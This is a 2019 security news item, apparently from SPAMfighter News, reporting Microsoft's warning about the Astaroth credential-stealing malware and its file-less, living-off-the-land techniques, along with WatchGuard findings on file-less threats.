Microsoft warns Windows users of infamous info-stealing malware spreading rapidly

Researchers belonging to MDATP (Microsoft Defender Advanced Threat Protection) are cautioning that an infamous malware, which steals credentials, is aiming attack at Windows users. The malware called Astaroth is being rapidly spread as it imposes file-less execution as well as "living-off-the-land" methodologies for circumventing detection by conventional AV tools, suggests one fresh study by Microsoft.

The researchers uncovered the latest attack scheme as Andrea Lelli, Senior Software Engineer at Microsoft noticed a glitch inside one detection algorithm created for locating one particular kind of file-less methodology. A file-less malicious program is referred to malware variants which do not depend upon files for execution of their malevolent payload.

Observing the tool, researchers saw a drastic rise within the utilization of WMIC (Windows Management Instrumentation Command) type tool that executed the XSL Script Processing script while labeling a file-less assault.

The info-stealing malware Astaroth filches sensitive data for e.g. keystrokes, credentials as well as other kinds of information that it exfiltrates as also dispatches to the remote hacker. www.healthitsecurity.com posted this, July 9, 2019.

For launching an attack, Astaroth typically leverages one malware-induced web-link embedded onto one spear-phishing electronic mail which takes the end-user onto certain LNK file. Known as 'living off the land,' this method utilizes genuine tools from the host machine towards pretence like a regular operation. The hacker subsequently utilizes stolen information towards accomplishing lateral movement across the network.

Meanwhile, Cybereason's security researcher Eli Salem says the Astaroth assaults are regarded difficult for identifying since the entire deployment procedure as also running of the malicious program happens via the Windows LOLBins. Normally, such an operation appears as lawful Windows operation since its execution is done with Windows processes.

Also, one new 'threat intelligence report' by WatchGuard tells file-less threats got listed inside both the ten most prolific malware and the ten most high-profile network attack catalogs by WatchGuard. Among the top malware threats, one could see certain code-injection assault based on PowerShell within the ten most prolific malware items, never seen before. Conversely, Meterpreter a widely applied file-less backdoor threat appeared for the first time within the ten most high-profile network assaults.

» SPAMfighter News - 7/19/2019